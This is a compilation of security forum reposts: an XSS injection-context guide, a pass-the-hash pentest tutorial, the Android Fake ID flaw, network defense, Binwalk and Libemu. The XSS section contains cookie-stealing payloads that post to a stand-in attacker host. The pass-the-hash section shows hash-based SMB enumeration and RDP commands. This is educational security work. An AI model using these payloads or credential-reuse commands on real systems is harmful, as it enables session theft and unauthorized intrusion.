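# SSL pass-through: TCP mode, the encrypted stream is routed untouched
# and each backend server terminates SSL itself.
frontend https_passthrough
    bind *:443
    mode tcp
    default_backend app_ssl

backend app_ssl
    mode tcp
    server app1 10.0.0.11:443 check
```

With pass-through the backend never sees X-Forwarded-For; if you control the backends, one way to recover the client IP is the PROXY protocol (send-proxy on the server line), which the backend server then has to understand as well.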
-
Contexts and Cross-site Scripting - a brief intro

Yesterday Anant posted a question in the IronWASP Facebook group asking about the different potential contexts related to XSS, to better understand how context specific filtering is done. It would be hard to post the response in a comment so I am turning it into a blog post instead. If you are the kind of person who likes reading code instead of text then download the source code of IronWASP and check out the CrossSiteScriptingCheck.cs file in the ActivePlugins directory; this post is based on the logic IronWASP uses for its XSS check.

If user controlled input appears in some part of a web page and if this behaviour leads to the security of the site getting compromised in some way, then the page is said to be affected by Cross-site Scripting. A web page is nothing but text; the browser however does not look at it as a single monolithic blob of text. Instead, different sections of the page could be interpreted differently by the browser as HTML, CSS or JavaScript. Just like the word 'date' could mean a fruit, a point in time or a romantic meeting based on the context in which it appears, the impact that user input appearing in the page can have would depend on the context in which the browser tries to interpret the user input. I will try to list out the different contexts in which user input can occur in a web page.

1) Simple HTML Context

In the body of an existing HTML tag or at the start and end of the page outside of the <html> tag.

<some_html_tag> user_input </some_html_tag>

In this context you can enter any kind of valid HTML in the user input and it would immediately be rendered by the browser; it's an executable context.

Eg: <img src=x onerror=alert(1)>

2) HTML Attribute Name Context

Inside the opening HTML tag, after the tag name or after an attribute value.
<some_html_tag user_input some_attribute_name="some_attribute_value"/>

In this context you can enter an event handler name and JavaScript code following an = symbol and we can have code execution; it can be considered an executable context.

Eg: onclick="alert(1)"

3) HTML Attribute Value Context

Inside the opening HTML tag, after an attribute name separated by an = symbol.

<some_html_tag some_attribute_name="user_input" />
<some_html_tag some_attribute_name='user_input' />
<some_html_tag some_attribute_name=user_input />

There are three variations of this context:
- Double quoted attribute
- Single quoted attribute
- Quote-less attribute

Code execution in this context would depend on the type of attribute in which the input appears. There are different types of attributes:

a) Event attributes

These are attributes like onclick, onload etc. and the values of these attributes are executed as JavaScript. So anything here is the same as the JavaScript context.

b) URL attributes

These are attributes that take a URL as a value, for example the src attribute of different tags. Entering a JavaScript URL here could lead to JavaScript execution.

Eg: javascript:some_javascript()

c) Special URL attributes

These are URL attributes where entering a regular URL can lead to security issues. Some examples are:

<script src="user_input"
<iframe src="user_input"
<frame src="user_input"
<link href="user_input"
<object data="user_input"
<embed src="user_input"
<form action="user_input"
<button formaction="user_input"
<base href="user_input"
<a href="user_input"

Entering just an absolute http or https URL in these cases could affect the security of the website. In some cases, if it is possible to upload user controlled data on to the server, then even entering relative URLs here would lead to a problem.
Some sites might strip off http:// and https:// from the values entered in these attributes to prevent absolute URLs from being entered, but there are many ways in which an absolute URL can be specified.

d) META tag attributes

Meta tags like charset can influence how the contents of the page are interpreted by the browser. And then there is the http-equiv attribute, which can emulate the behaviour of HTTP response headers. Influencing the values of headers like Content-Type, Set-Cookie etc. will have an impact on the security of the page.

e) Normal attributes

If the input appears in a normal attribute value then this context must be escaped to lead to code execution. If the attribute is quoted then the corresponding quote must be used to escape the context. In the case of unquoted attributes, a space or backslash should do the job. Once out of this context a new event handler can be added to lead to code execution.

Eg:
" onclick=alert(1)
' onclick=alert(1)
onclick=alert(1)

4) HTML Comments Context

Inside the comments section of HTML.

<!-- some_comment user_input some_comment -->

This is a non-executable context and it is required to come out of this context to execute code. Entering a --> would terminate this context and switch any subsequent text to HTML context.

Eg: --><img src=x onerror=alert(1)>

5) JavaScript Context

Inside the JavaScript code portions of the page.

<script> some_javascript user_input some_javascript </script>

This applies to the section enclosed by the SCRIPT tags, to event handler attribute values and to URLs starting with javascript: .
Inside JavaScript, user input could appear in the following contexts:

a) Code context
b) Single quoted string context
c) Double quoted string context
d) Single line comment context
e) Multi-line comment context
f) Strings being assigned to Executable Sinks

If user input is between SCRIPT tags then, no matter in which of the above contexts it appears, you can switch to the HTML context simply by including a closing SCRIPT tag and then insert any HTML.

Eg: </script><img src=x onerror=alert(1)>

If you are not going to switch to HTML context then you have to tailor the input depending on the specific JavaScript context it appears in.

a) Code Context

function dev_func(input) {some_js_code}
dev_func(user_input);
some_variable=123;

This is an executable context; user input directly appears as an expression and you can directly enter JavaScript statements and they will be executed.

Eg: $.post("http://attacker.site", {'cookie':document.cookie}, function(){})//

b) Single quoted string context

var some_variable='user_input';

This is a non-executable context and the user input must include a single quote at the beginning to switch out of the string context and enter the code context.

Eg: '; $.post("http://attacker.site", {'cookie':document.cookie}, function(){})//

c) Double quoted string context

var some_variable="user_input";

This is a non-executable context and the user input must include a double quote at the beginning to switch out of the string context and enter the code context.

Eg: "; $.post("http://attacker.site", {'cookie':document.cookie}, function(){})//

d) Single-line comment context

some_js_func();//user_input

This is a non-executable context and the user input must include a new line character to terminate the single line comment context and switch to the code context.
Eg: \r\n$.post("http://attacker.site", {'cookie':document.cookie}, function(){})//

e) Multi-line comment context

some_js_func(); /* user_input */ some_js_code

This is a non-executable context and the user input must include */ to terminate the multi-line comment context and switch to the code context.

Eg: */$.post("http://attacker.site", {'cookie':document.cookie}, function(){})//

f) Strings being assigned to Executable Sinks

These are single quoted or double quoted string contexts, but the twist is that these strings are passed to a function or assigned to a property that would treat the string as executable code. Some examples are:

eval("user_input");
location = "user_input";
setTimeout("user_input", 1000);
x.innerHTML = "user_input";

For more sinks refer to the DOM XSS wiki. This should be treated similar to the Code context.

6) VB Script Context

This is very rare these days but there still might be that odd site that uses VBScript.

<script language="vbscript" type="text/vbscript"> some_vbscript user_input some_vbscript </script>

Like JavaScript, you could switch out to HTML context with the </SCRIPT> tag.

Inside VBScript, user input could appear in the following contexts:

a) Code context
b) Single-line comment
c) Double quoted string context
d) Strings being assigned to Executable Sinks

a) Code Context
Similar to its JavaScript equivalent, you can directly enter VBScript.

b) Single-line comment
VBScript only has single-line comments and, similar to its JavaScript equivalent, entering a new line character will terminate the comment context and switch to code context.

c) Double quoted string
Similar to its JavaScript equivalent.

d) Strings being assigned to Executable Sinks
Similar to its JavaScript equivalent.

7) CSS Context

Inside the CSS code portions of the page.

<style> some_css user_input some_css </style>

This applies to the section enclosed by the STYLE tags and to style attribute values. Injecting CSS into a page could itself have some kind of impact on the page.
For example, by changing the location, visibility, size and z-index of the elements in a page it might be possible to make the user perform an action different from what they think they are doing. But the more interesting aspect is in how JavaScript can be executed from within CSS. Though not possible in modern browsers, older browsers did support JavaScript execution in two ways.

i. expression property

expression is an Internet Explorer-only feature that allows execution of JavaScript embedded inside CSS.

css_selector { property_name: expression(some_javascript); }

ii. JavaScript URLs

Some CSS properties like the background-image property take a URL as their value. In older browsers, entering a JavaScript URL here would result in JavaScript code being executed.

css_selector { background-image: javascript:some_javascript() }

Inside CSS, user input could appear in the following contexts:

a) Statement context
b) Single quoted/Double quoted string context
c) Multi-line comment context
d) Strings being assigned to Executable Sinks

Similar to the SCRIPT tag, if user input is between STYLE tags then you can switch to the HTML context simply by including a closing STYLE tag and then insert any HTML.

Eg: </style><img src=x onerror=alert(1)>

If you are not going to switch to HTML context then you have to tailor the input depending on the specific CSS context it appears in.

a) Statement Context

In this context you can directly start including CSS to modify the page for a social engineering attack, or make use of the expression property or the JavaScript URL method to inject JavaScript code.

b) Single quoted/Double quoted string context

Including a single or double quote at the start of the input would terminate the string context and switch to statement context.

c) Multi-line comment context

Similar to a JavaScript multi-line comment, entering */ would terminate the comment context and switch to statement context.
d) Strings being assigned to Executable Sinks

This is a single-quoted or double-quoted string that is either passed to the expression property or assigned to a property that takes a URL, like background-image. In both cases the data inside the string context can be interpreted as JavaScript code by the browser.

Though I have mentioned the standard way to escape out of the different contexts, these are by no means the only ways. There are plenty of browser quirks that allow escaping out of contexts in strange ways. To find out about them I would recommend you get the Web Application Obfuscation book and also refer to the HTML5 Security Cheatsheet and the fuzz results of Shazzer. There is a good chance you might already know about OWASP's XSS Prevention CheatSheet; you might also find this other XSS Protection Cheat Sheet to be useful.

Posted by IronWASP at 5:56 AM

Sursa: IronWASP - Open Source Advanced Web Security Testing Platform: Contexts and Cross-site Scripting - a brief intro
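A scanner decides which of the contexts above an input landed in by reflecting a unique marker and inspecting the characters around it. This toy classifier (my sketch, far cruder than IronWASP's CrossSiteScriptingCheck.cs) covers the major cases and works on any page source you already fetched:

```python
# A toy context classifier: find a unique reflected marker in the page,
# then look backwards from where it landed to guess which context it
# sits in. Fetching the page is left out; classify() works on any page
# source you already have.
MARKER = "zqx9"

def classify(page):
    idx = page.find(MARKER)
    if idx == -1:
        return "not reflected"
    before = page[:idx].lower()
    # An unclosed <script>, <style>, <!-- or < before the marker tells
    # us which parser the browser will be running at that point.
    if before.rfind("<script") > before.rfind("</script>"):
        return "javascript"
    if before.rfind("<style") > before.rfind("</style>"):
        return "css"
    if before.rfind("<!--") > before.rfind("-->"):
        return "html comment"
    if before.rfind("<") > before.rfind(">"):
        return "html attribute"
    return "html"

print(classify("<input value='zqx9'>"))  # prints: html attribute
```

A real check would go further in exactly the directions the post describes: distinguishing quoted from unquoted attributes, string from code context inside script blocks, and so on, then picking the matching breakout payload.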
-
[h=1]HIP14-Defeating UEFI/WIN8 secureboot[/h]
Published on Jul 29, 2014
By John Butterworth
Hack in Paris: the leading IT security technical event in France, organized by Sysdream
-
[h=1]HIP14-Pentesting NoSQL exploitation framework[/h]
Published on Jul 29, 2014
By Francis Alexander
Hack in Paris: the leading IT security technical event in France, organized by Sysdream
-
[h=3]Defensible Network Architecture 2.0[/h]

Four years ago when I wrote The Tao of Network Security Monitoring I introduced the term defensible network architecture. I expanded on the concept in my second book, Extrusion Detection. When I first presented the idea, I said that a defensible network is an information architecture that is monitored, controlled, minimized, and current. In my opinion, a defensible network architecture gives you the best chance to resist intrusion, since perfect intrusion prevention is impossible.

I'd like to expand on that idea with Defensible Network Architecture 2.0. I believe these themes would be suitable for a strategic, multi-year program at any organization that commits itself to better security. You may notice the contrast with the Self-Defeating Network and the similarities to my Security Operations Fundamentals. I roughly order the elements in a series from least likely to encounter resistance from stakeholders to most likely to encounter resistance from stakeholders.

A Defensible Network Architecture is an information architecture that is:

Monitored. The easiest and cheapest way to begin developing DNA on an existing enterprise is to deploy Network Security Monitoring sensors capturing session data (at an absolute minimum), full content data (if you can get it), and statistical data. If you can access other data sources, like firewall/router/IPS/DNS/proxy/whatever logs, begin working that angle too. Save the tougher data types (those that require reconfiguring assets and buying mammoth databases) until much later. This needs to be a quick win with the data in the hands of a small, centralized group. You should always start by monitoring first, as Bruce Schneier proclaimed so well in 2001.

Inventoried. This means knowing what you host on your network. If you've started monitoring you can acquire a lot of this information passively. This is new to DNA 2.0 because I assumed it would be already done previously. Fat chance!
Controlled. Now that you know how your network is operating and what is on it, you can start implementing network-based controls. Take this anyway you wish -- ingress filtering, egress filtering, network admission control, network access control, proxy connections, and so on. The idea is you transition from an "anything goes" network to one where the activity is authorized in advance, if possible. This step marks the first time where stakeholders might start complaining. Claimed. Now you are really going to reach out and touch a stakeholder. Claimed means identifying asset owners and developing policies, procedures, and plans for the operation of that asset. Feel free to swap this item with the previous. In my experience it is usually easier to start introducing control before making people take ownership of systems. This step is a prerequisite for performing incident response. We can detect intrusions in the first step. We can only work with an asset owner to respond when we know who owns the asset and how we can contain and recover it. Minimized. This step is the first to directly impact the configuration and posture of assets. Here we work with stakeholders to reduce the attack surface of their network devices. You can apply this idea to clients, servers, applications, network links, and so on. By reducing attack surface area you improve your ability to perform all of the other steps, but you can't really implement minimization until you know who owns what. Assessed. This is a vulnerability assessment process to identify weaknesses in assets. You could easily place this step before minimization. Some might argue that it pays to begin with an assessment, but the first question is going to be: "What do we assess?" I think it might be easier to start disabling unnecessary services first, but you may not know what's running on the machines without assessing them. Also consider performing an adversary simulation to test your overall security operations. 
Assessment is the step where you decide if what you've done so far is making any difference. Current. Current means keeping your assets configured and patched such that they can resist known attacks by addressing known vulnerabilities. It's easy to disable functionality no one needs. However, upgrades can sometimes break applications. That's why this step is last. It's the final piece in DNA 2.0. So, there's DNA 2.0 -- MICCMAC (pronounced "mick-mack"). You may notice the Federal government is adopting parts of this approach, as mentioned in my post Feds Plan to Reduce, then Monitor. I prefer to at least get some monitoring going first, since even incomplete instrumentation tells you what is happening. Minimization based on opinion instead of fact is likely to be ugly. Did I miss anything? Posted by Richard Bejtlich at 22:22 Sursa: TaoSecurity: Defensible Network Architecture 2.0
-
Android crypto blunder exposes users to highly privileged malware
"Fake ID" exploits work because Android doesn't properly inspect certificates.
by Dan Goodin - July 29, 2014, 2:00pm

A slide from next week's Black Hat talk titled Android Fake ID vulnerability. Bluebox Security

The majority of devices running Google's Android operating system are susceptible to hacks that allow malicious apps to bypass a key security sandbox so they can steal user credentials, read e-mail, and access payment histories and other sensitive data, researchers have warned.

The high-impact vulnerability has existed in Android since the release of version 2.1 in early 2010, researchers from Bluebox Security said. They dubbed the bug Fake ID because, like a fraudulent driver's license an underage person might use to sneak into a bar, it grants malicious apps special access to Android resources that are typically off-limits. Google developers have introduced changes that limit some of the damage that malicious apps can do in Android 4.4, but the underlying bug remains unpatched, even in the Android L preview.

The Fake ID vulnerability stems from the failure of Android to verify the validity of cryptographic certificates that accompany each app installed on a device. The OS relies on these credentials when allocating special privileges that allow a handful of apps to bypass Android sandboxing. Under normal conditions, the sandbox prevents programs from accessing data belonging to other apps or to sensitive parts of the OS. Select apps, however, are permitted to break out of the sandbox. Adobe Flash in all but version 4.4, for instance, is permitted to act as a plugin for any other app installed on the phone, presumably to allow it to add animation and graphics support. Similarly, Google Wallet is permitted to access Near Field Communication hardware that processes payment information.

According to Jeff Forristal, CTO of Bluebox Security, Android fails to verify the chain of certificates used to certify that an app belongs to this elite class of super-privileged programs. As a result, a maliciously developed app can include an invalid certificate claiming it's Flash, Wallet, or any other app hard-coded into Android. The OS, in turn, will give the rogue app the same special privileges assigned to the legitimate app without ever taking the time to detect the certificate forgery.

"All it really takes is for an end user to choose to install this fake app, and it's pretty much game over," Forristal told Ars. "The Trojan horse payload will immediately escape the sandbox and start doing whatever evil things it feels like, for instance, stealing personal data."

Other apps that receive special Android privileges include device management extensions from a company known as 3LM. Organizations use such apps to add security enhancements and other special features to large fleets of phones. An app that masqueraded as one of these programs could gain almost unfettered administrative rights on phones that were configured to work with the manager. Forristal hasn't ruled out the existence of other apps that are automatically assigned heightened privileges by Android.

Changes introduced in Android 4.4 limit some of the privileges Android grants to Flash. Still, Forristal said the failure to verify the certificate chain is present in all Android devices since 2.1. That means malicious apps can bypass sandbox restrictions by impersonating Google Wallet, 3LM managers, and any other apps Android is hardcoded to favor. A spokesman for Google issued the following statement:

We appreciate Bluebox responsibly reporting this vulnerability to us; third-party research is one of the ways Android is made stronger for users. After receiving word of this vulnerability, we quickly issued a patch that was distributed to Android partners, as well as to AOSP. Google Play and Verify Apps have also been enhanced to protect users from this issue. At this time, we have scanned all applications submitted to Google Play as well as those Google has reviewed from outside of Google Play, and we have seen no evidence of attempted exploitation of this vulnerability.

The statement didn't say exactly what Google did to patch the vulnerability or specify whether any Android partners have yet to distribute it to end users. This article will be updated if company representatives elaborate beyond the four sentences above.

As Ars has documented previously, it's not unusual for attackers to sneak malicious apps into the official Google Play marketplace. If it's possible for approved apps to contain cryptocurrency miners, remote access trojans, or other hidden functions, there's no obvious reason they can't include cryptographic credentials fraudulently certifying they were spawned by 3LM, Google, Microsoft, or any other developer granted special privileges.

"With this vulnerability, malware has a way to abuse any one of these hardcoded identities that Android implicitly trusts," said Forristal, who plans to divulge additional details at next week's Black Hat security conference. "So malware can use the fake Adobe ID and become a plugin to other apps. Malware can also use the 3LM to control the entire device."

Listing image courtesy of Greayweed.

Sursa: Android crypto blunder exposes users to highly privileged malware | Ars Technica
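To make the flaw concrete, here is a small, hypothetical Python sketch of the difference between a chain check that only compares subject/issuer names (the kind of shortcut Fake ID exploits) and one that also verifies each certificate's signature. All names, keys, and the `sign` stand-in are invented for illustration; this is not Android's actual code, and real verification uses asymmetric signatures rather than a shared-key hash.

```python
# Toy model of the Fake ID class of bug: a chain checker that trusts
# subject/issuer names alone versus one that also verifies signatures.
# Every name and key here is made up; sign() is a symbolic stand-in
# for a real public-key signature.
import hashlib

def sign(issuer_key: bytes, payload: bytes) -> bytes:
    # Stand-in for a real signature: only the holder of issuer_key can
    # produce it, and the verifier recomputes it with the same key.
    return hashlib.sha256(issuer_key + payload).digest()

def make_cert(subject, issuer, issuer_key, forge=False):
    payload = f"{subject}|{issuer}".encode()
    # A forger can *claim* any issuer, but can't sign with its key.
    sig = sign(b"attacker-key" if forge else issuer_key, payload)
    return {"subject": subject, "issuer": issuer, "payload": payload, "sig": sig}

def chain_ok_names_only(chain, trusted_subject):
    # Vulnerable logic: accept the chain if the names simply line up.
    return all(chain[i]["issuer"] == chain[i + 1]["subject"]
               for i in range(len(chain) - 1)) and chain[-1]["subject"] == trusted_subject

def chain_ok_verified(chain, trusted_subject, keys):
    # Fixed logic: names must line up AND every certificate's signature
    # must verify under its issuer's key.
    if chain[-1]["subject"] != trusted_subject:
        return False
    for i in range(len(chain) - 1):
        cert, issuer = chain[i], chain[i + 1]
        if cert["issuer"] != issuer["subject"]:
            return False
        if cert["sig"] != sign(keys[issuer["subject"]], cert["payload"]):
            return False
    return True

keys = {"Adobe Root": b"adobe-root-key"}
root = make_cert("Adobe Root", "Adobe Root", keys["Adobe Root"])
# Malware names Adobe as its issuer but can't produce Adobe's signature.
fake = make_cert("Evil App", "Adobe Root", keys["Adobe Root"], forge=True)

print(chain_ok_names_only([fake, root], "Adobe Root"))      # True  -> privilege granted
print(chain_ok_verified([fake, root], "Adobe Root", keys))  # False -> forgery caught
```

The name-only check happily grants the forged chain the trusted identity, which is exactly why an app carrying a bogus "issued by Adobe" certificate could inherit Flash's plugin privileges.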
-
Binwalk v2.0.0, released by devttys0.

Highlights:
- Python3 support
- Raw deflate detection/extraction
- Improved API
- Improved speed
- More (and improved) signatures
- Faster entropy scans
- Much more...

Lots of thanks to everyone who submitted patches and bug reports!

Sursa: https://github.com/devttys0/binwalk/releases/tag/v2.0.0
-
Pass-the-Hash is Dead: Long Live Pass-the-Hash
July 29, 2014 by harmj0y

You may have heard the word recently about how a recent Microsoft patch has put all of us pentesters out of a job. Pass-the-hash is dead, attackers can no longer spread laterally, and Microsoft has finally secured its authentication mechanisms. Oh wait: this is a fully-patched Windows 7 system in a fully-patched Windows 2012 domain. So what's going on here: what has Microsoft claimed to do, what have they actually done, and what are the implications of all of this?

The security advisory and associated knowledge base article we're dealing with here is KB2871997 (aka the "Mimikatz KB"). Besides backporting some of the Windows 8.1 protections that make extracting plaintext credentials from LSASS slightly more difficult, the advisory includes this ominous (to pentesters, at least) statement: "Changes to this feature include: prevent network logon and remote interactive logon to domain-joined machine using local accounts...". On the surface, this looks like it totally quashes the Windows pivoting vectors we've been taking advantage of for so long [insert doom and gloom here]. Microsoft originally titled the advisory "Update to fix the Pass-The-Hash Vulnerablity" [sic], but quickly changed it to "Update to improve credentials protection and management" (http://www.infosecisland.com/blogview/23787-Windows-Update-to-Fix-Pass-the-Hash-Vulnerability-Not.html).

It's true, Microsoft has definitely raised the bar: accounts that are members of the local "Administrators" group are no longer able to execute code with WMI or PSEXEC, use schtasks or at, or even browse the open shares on the target machine. Oh, except (as pwnag3 reports and our experiences confirm) the RID 500 built-in Administrator account, even if it's renamed.
While Windows 7 installs will now disable this account by default and prompt the user to set up another local administrator, many organizations, due to standard advice and compliance, still have loads of RID 500 accounts enabled all over their enterprise. Some organizations rely on this account for backwards-compatibility reasons, and some use it as a way to perform vulnerability scans without passing around Domain Admin credentials.

If a domain is built using only modern Windows OSs and COTS products (which know how to operate within these new constraints), and configured correctly with no shortcuts taken, then these protections represent a big step forward. Microsoft has finally started to wise up to some of its inherent security issues, which I seriously applaud them for. However, the vast majority of organizations are a Frankensteinian amalgamation of security/management products, old (and sometimes unpatched) servers, heterogeneous clients, lazy admins, backwards-compatibility-focused engineers, and usability-focused business units. Regardless, accounts with this security identifier are almost certainly going to be enabled and around for a while.

Additionally, Windows 2003 isn't affected (and will surely linger around organizations significantly longer than Windows XP), and domain accounts which maintain administrative access over a machine can still have their hashes passed to your heart's content. Also, these local admin accounts should still work with psremoting if it's enabled. Some organizations will leave the WinRM service running as an artifact of deployment, and while you can't use hashes for auth in this case, plaintext credentials can be specified for a remote PowerShell session.

But let's say everything's set up fairly well, the default Administrator account is disabled, and you end up dumping the hash of another local admin user on a box.
How is this going to look in the field when you try your normal pivoting, and what options are still open? Your favorite scanner will still likely flag the credentials as valid on machines with the same account reused, as the following example with the local admin 'mike:password' demonstrates. However, when you try to use PSEXEC or WMIS to trigger agents or commands, or use Impacket's functionality to browse the file shares, you'll encounter something like this: the "pth-winexe" example above shows the difference between invalid credentials (NT_STATUS_LOGON_FAILURE) and the new patch behavior.

If you happen to have the plaintext (through group policy preferences, some Mimikatz luck, or cracking the dumped NTLM hashes), you can still RDP to a target successfully with something like rdesktop -u mike -p password 192.168.52.151. But be careful: if you're going after a Windows 7 machine and a domain user is currently logged on, it will politely ask them whether they want to allow your remote session in, meaning this is probably best left for after-hours. Also, an interesting note: if you have hashes for a domain user and are dealing with the new restricted admin mode, you might be able to pass-the-hash with RDP itself! The Kali Linux guys have a great writeup on doing just that with xfreerdp.

So here we are, with the RID 500 local Administrator account, as well as any domain accounts granted administrative privileges over a machine, still being able to utilize Metasploit or the pass-the-hash toolkit to install agents or execute code on target systems. It seems like it would be useful to be able to enumerate what name the local RID 500 account is currently using, as well as any network users in the local Administrators group.
Unfortunately, even if you get access to a basic user account on some target machine and get in a position to abuse Active Directory, you can't query local administrators with WMI as you might like. But all hope is not lost, with backwards compatibility, the bane of Microsoft's existence, once again coming to our aid. The Active Directory Service Interfaces (ADSI) WinNT provider can be used to query information from domain-attached machines, even from non-privileged user accounts. A remnant of NT4 domain deployments, the WinNT provider in some cases allows a non-privileged domain user to query information from target machines, including things like all the local groups and associated members (with SIDs and all).

If we have PowerShell access on a Windows domain machine, we can try enumerating all the local groups on a target machine with something like:

$computer = [ADSI]"WinNT://WINDOWS2,computer"
$computer.psbase.children | where { $_.psbase.schemaClassName -eq 'group' } | foreach { ($_.name)[0] }

If we want the members of a specific group, that's not hard either:

$members = @($([ADSI]"WinNT://WINDOWS2/Administrators").psbase.Invoke("Members"))
$members | foreach { $_.GetType().InvokeMember("ADspath", 'GetProperty', $null, $_, $null) }

These functions have been integrated into Veil-PowerView as Get-NetLocalGroups and Get-NetLocalGroup, respectively. Another function, Invoke-EnumerateLocalAdmins, has also been built and integrated. This will query the domain for hosts and enumerate every machine for members of a specific local group (default of 'Administrators'). There are options for host lists, delay/jitter between host enumerations, and whether you want to pipe everything automatically to a CSV file. This gives you some nice, sortable .csv output with the server name, account, whether the name is a group or not, whether the account is enabled, and the full SID associated with the account.
The built-in Administrator account is the one ending in *-500. And again, this is all with an unprivileged Windows domain account.

If you just have a hash and want the same information without having to use PowerShell, the Nmap scripts smb-enum-groups.nse and smb-enum-users.nse can accomplish the same thing using a valid account for the machine (even a member of local admins!) along with a password or hash:

nmap -p U:137,T:139 --script-args 'smbuser=mike,smbhash=8846f7eaee8fb117ad06bdd830b7586c' --script=smb-enum-groups --script=smb-enum-users 192.168.52.151

If you want to use a domain account, set your flags to something like --script-args 'smbdomain=DOMAIN,smbuser=USER,smbpass/smbhash=X'. You'll be able to enumerate the RID 500 account name and whether it's disabled, as well as all the members of the local Administrators group on the machine. If a returned member of the Administrators group doesn't show up in the smb-enum-users list, like 'Jason' in this instance, it's likely a domain account. This information can give you a better idea of what credentials will work where, and what systems/accounts you need to target.

If you have any issues or questions with PowerView, submit them to the official Github page, hit me up on Twitter at @harmj0y, email me at will [at] harmj0y.net, or find me on Freenode in #veil, #armitage, or #pssec under harmj0y. And if you're doing the Blackhat/Defcon gauntlet this year, come check out the Veil-Framework BH Arsenal booth and/or my presentation on post-exploitation, as well as all the other awesome talks lined up this year!

Sursa: Pass-the-Hash is Dead: Long Live Pass-the-Hash – harmj0y
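Since the built-in Administrator keeps RID 500 no matter what it is renamed to, it is the SID, not the account name, that you should sort enumeration output by. A minimal, hypothetical Python helper along those lines (the account names and SIDs below are made up, not from a real environment):

```python
# Triage enumerated local-admin accounts by RID: the built-in
# Administrator is always the one whose SID ends in -500, even when
# renamed. Names and SIDs here are invented example data.

def rid(sid: str) -> int:
    # The relative identifier (RID) is the final dash-separated
    # subauthority of a SID string like S-1-5-21-...-500.
    return int(sid.rsplit("-", 1)[1])

def find_builtin_admins(accounts):
    # accounts: iterable of (name, sid) pairs, e.g. rows parsed from
    # the CSV an enumeration sweep writes out.
    return [(name, sid) for name, sid in accounts if rid(sid) == 500]

accounts = [
    ("WINDOWS2\\SuperUser", "S-1-5-21-1004336348-1177238915-682003330-500"),
    ("WINDOWS2\\mike", "S-1-5-21-1004336348-1177238915-682003330-1001"),
    ("DOMAIN\\Jason", "S-1-5-21-2052111302-1767601862-3910497204-1106"),
]

for name, sid in find_builtin_admins(accounts):
    print(name, sid)   # prints only the renamed RID 500 account
```

Filtering this way surfaces the renamed built-in Administrator ("SuperUser" in the toy data) regardless of what the account is called.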
-
[h=2]On Breaking PHP-based cross-site scripting protection Mechanisms in the wild[/h] A talk by Ashar Javed @ Garage4Hackers WebCast (28-07-2014) Previously presented at OWASP Spain Chapter Meeting 13-06-2014, Barcelona (Spain) Slides: On Breaking PHP-Based Cross-Site Scripting Protections In The Wild by Ashar Javed
-
Shellcode Detection and Emulation with Libemu

Introduction

Libemu is a library which can be used for x86 emulation and shellcode detection. It can be used in IDS/IPS/honeypot systems to emulate x86 shellcode, which can then be further processed to detect malicious behavior. It can also be used together with Wireshark to pull shellcode off the wire for analysis, to analyze shellcode inside malicious .rtf/.pdf documents, and so on. It has a lot of use cases and is used in numerous open-source projects like dionaea, thug, peepdf, and pyew, and it plays an integral part in shellcode analysis. Libemu can detect and execute shellcode by using GetPC heuristics, as we will see later in the article.

The very first thing we can do is download Libemu via Git with the following command:

# git clone git://git.carnivore.it/libemu.git

If we would like to know how much code has been written for this project, we can simply execute sloccount, which will output the number of lines for each subdirectory and a total of 43,742 ANSI C code lines and 15 Python code lines. If we would rather look at nice graphs, we can visit the Ohloh web page, where it's evident that about 50k lines of code have been written. The installation instructions can be found at [1], which is why we won't describe them in this article. We can also install Pylibemu, so we can interact with Libemu directly from Python.

Articol complet: Shellcode Detection and Emulation with Libemu - InfoSec Institute
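To give a feel for what "GetPC heuristics" means, here is a deliberately simplified, pure-Python byte scanner for two classic GetPC idioms that position-independent shellcode uses to learn its own address. This is only a toy pattern matcher for illustration; libemu's real detection is emulation-based, not a static scan.

```python
# Toy stand-in for GetPC detection: flag two classic idioms in a
# byte buffer.
#   1. call rel32 (E8 xx xx xx xx) whose target lands inside the
#      buffer itself (the call/pop trick: the pushed return address
#      is then popped into a register)
#   2. fldz / fnstenv [esp-0xC] (D9 EE D9 74 24 F4), which leaks EIP
#      through the saved FPU environment
import struct

def getpc_offsets(buf: bytes):
    hits = []
    for i in range(len(buf)):
        # call rel32 with a target inside the buffer
        if buf[i] == 0xE8 and i + 5 <= len(buf):
            rel = struct.unpack_from("<i", buf, i + 1)[0]
            target = i + 5 + rel
            if 0 <= target < len(buf):
                hits.append(i)
        # fldz / fnstenv [esp-0xC] sequence
        if buf[i:i + 6] == b"\xd9\xee\xd9\x74\x24\xf4":
            hits.append(i)
    return hits

# A call whose rel32 (-7) points back to the start of the buffer,
# as in the call/pop GetPC idiom, followed by pop eax (0x58).
stub = b"\x90\x90" + b"\xe8\xf9\xff\xff\xff" + b"\x58"
print(getpc_offsets(stub))   # [2]: the call at offset 2 targets offset 0
```

A real engine like libemu goes much further: it starts emulation at each candidate offset and only reports shellcode when execution actually behaves like shellcode, which keeps the false-positive rate far below what a byte-pattern scan can achieve.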